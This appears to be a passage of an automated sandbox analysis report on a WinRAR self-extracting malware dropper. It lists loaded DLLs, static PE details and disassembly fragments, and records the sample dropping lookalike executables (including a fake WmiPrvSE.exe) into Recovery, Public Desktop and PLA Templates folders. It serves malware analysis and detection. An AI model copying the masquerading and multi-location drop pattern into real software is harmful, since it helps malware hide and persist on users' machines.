Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: version.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Section loaded: midimap.dll	Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Recovery\WBnjVTGHzbhirvM.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 0V2JsCrGUB.exe

Static file information: File size 2237197 > 1048576

Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 0V2JsCrGUB.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 0V2JsCrGUB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 0V2JsCrGUB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 0V2JsCrGUB.exe

Source: 0V2JsCrGUB.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 0V2JsCrGUB.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 0V2JsCrGUB.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 0V2JsCrGUB.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 0V2JsCrGUB.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

File created: C:\winRefruntime\__tmp_rar_sfx_access_check_6448890

Jump to behavior

Source: 0V2JsCrGUB.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035F640 push ecx; ret	0_2_0035F653
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035EB78 push eax; ret	0_2_0035EB96
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B754B90 push ss; retf	4_2_00007FFD9B754B9B
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B7547A0 push cs; iretd	4_2_00007FFD9B7547A3
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B750AFB push ebx; retf	4_2_00007FFD9B750B1A
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B754B54 push edx; retf	4_2_00007FFD9B754B5F
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B750AD3 push ebx; retf	4_2_00007FFD9B750B1A
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B753A3D push ebp; iretd	4_2_00007FFD9B753A40
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B7509B0 push ebx; retf	4_2_00007FFD9B750B1A
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Code function: 4_2_00007FFD9B7500BD pushad ; iretd	4_2_00007FFD9B7500C1
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B784B90 push ss; retf	11_2_00007FFD9B784B9B
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B7847A0 push cs; iretd	11_2_00007FFD9B7847A3
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B780AFA push ebx; retf	11_2_00007FFD9B780B1A
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B784B54 push edx; retf	11_2_00007FFD9B784B5F
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B780AD3 push ebx; retf	11_2_00007FFD9B780B1A
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B783A3D push ebp; iretd	11_2_00007FFD9B783A40
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B7809B0 push ebx; retf	11_2_00007FFD9B780B1A
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9B7800BD pushad ; iretd	11_2_00007FFD9B7800C1
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Code function: 11_2_00007FFD9BB7B2E2 push FFFFFF84h; ret	11_2_00007FFD9BB7B2E4

Source: MsAgentDriverruntime.exe.0.dr	Static PE information: section name: .text entropy: 7.54287297906507
Source: WBnjVTGHzbhirvM.exe.4.dr	Static PE information: section name: .text entropy: 7.54287297906507
Source: WBnjVTGHzbhirvM.exe0.4.dr	Static PE information: section name: .text entropy: 7.54287297906507
Source: WmiPrvSE.exe.4.dr	Static PE information: section name: .text entropy: 7.54287297906507
Source: WBnjVTGHzbhirvM.exe1.4.dr	Static PE information: section name: .text entropy: 7.54287297906507
Source: WBnjVTGHzbhirvM.exe2.4.dr	Static PE information: section name: .text entropy: 7.54287297906507

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\PinddLxP.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\sbJHDJmG.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\viSXCyGd.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\GWwNmKBL.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Recovery\WmiPrvSE.exe	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\cZPJNcWU.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\nFKhSFqw.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	File created: C:\winRefruntime\MsAgentDriverruntime.exe	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\hnfQTxsY.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\wJQffXMu.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\Public\Desktop\WBnjVTGHzbhirvM.exe	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\Default\Favorites\WBnjVTGHzbhirvM.exe	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Recovery\WBnjVTGHzbhirvM.exe	Jump to dropped file

Source: C:\winRefruntime\MsAgentDriverruntime.exe

File created: C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe

Jump to dropped file

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\PinddLxP.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\sbJHDJmG.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\hnfQTxsY.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File created: C:\Users\user\Desktop\wJQffXMu.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\cZPJNcWU.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\GWwNmKBL.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\viSXCyGd.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File created: C:\Users\user\Desktop\nFKhSFqw.log	Jump to dropped file

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
